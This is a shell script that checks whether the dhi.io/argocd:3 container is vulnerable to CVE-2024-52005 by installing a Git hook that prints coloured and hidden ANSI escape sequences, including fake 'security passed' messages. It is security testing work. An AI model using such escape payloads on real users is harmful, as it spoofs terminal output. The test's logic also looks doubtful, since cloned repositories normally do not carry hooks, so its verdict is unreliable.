#!/bin/sh
# Simple test to verify CVE-2024-52005 in dhi.io/argocd:3
# This creates a Git repo with a hook that outputs ANSI codes,
# then clones it with the DHI container to see if ANSI codes pass through

set -e

echo "[*] CVE-2024-52005 Simple Test"
echo "[*] Target: dhi.io/argocd:3"
echo ""

# Get the directory where this script is located
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
TEST_REPO="$SCRIPT_DIR/ansi-test-repo"
OUTPUT_LOG="$SCRIPT_DIR/ansi-test-output.log"

# Cleanup any previous test
rm -rf "$TEST_REPO" "$OUTPUT_LOG"

# Create test repository
echo "[+] Creating test Git repository..."
mkdir -p "$TEST_REPO"
cd "$TEST_REPO"
git init -q
echo "# Test Repository" > README.md
git add README.md
git commit -q -m "Initial commit"

# Create malicious post-checkout hook
echo "[+] Adding post-checkout hook with ANSI escape sequences..."
mkdir -p .git/hooks
cat > .git/hooks/post-checkout << 'HOOK_EOF'
#!/bin/sh
# This hook outputs ANSI escape sequences to stderr
# If CVE-2024-52005 is present, these will pass through to the terminal

# Red text
printf '\033[31mremote: CRITICAL SECURITY ALERT\033[0m\n' >&2

# Green text
printf '\033[32mremote: All security checks passed\033[0m\n' >&2

# Hidden text (should be invisible)
printf '\033[8mremote: Hidden malicious command here\033[0m\n' >&2

# Yellow warning
printf '\033[33mremote: WARNING: Proceed with caution\033[0m\n' >&2
HOOK_EOF
chmod +x .git/hooks/post-checkout

echo "[+] Hook created successfully"
echo ""

# Test with DHI ArgoCD container
echo "[+] Testing with dhi.io/argocd:3..."
echo "[+] Cloning repository inside container..."
echo "[+] Mounting: $TEST_REPO -> /repo (inside container)"
docker run --rm -v "$TEST_REPO:/repo:ro" dhi.io/argocd:3 \
  sh -c 'git clone /repo /tmp/test-clone 2>&1' | tee "$OUTPUT_LOG"

echo ""
echo "============================================"
echo "[+] Checking for ANSI escape sequences..."
echo "============================================"

if grep -F $'\033[' "$OUTPUT_LOG" > /dev/null 2>&1; then
    echo ""
    echo "[!] VULNERABLE: ANSI escape sequences found!"
    echo "[!] DHI's 'not_affected' status is INCORRECT"
    echo ""
    echo "Proof (showing raw ANSI codes):"
    cat -v "$OUTPUT_LOG"
    echo ""
    echo "[!] CVE-2024-52005 is exploitable in dhi.io/argocd:3"
else
    echo "[-] No ANSI sequences detected (might be filtered)"
fi

echo ""
echo "[*] Test complete. Output saved to $OUTPUT_LOG"
echo "[*] Test repository: $TEST_REPO"
echo "[*] Cleanup: rm -rf $TEST_REPO $OUTPUT_LOG"
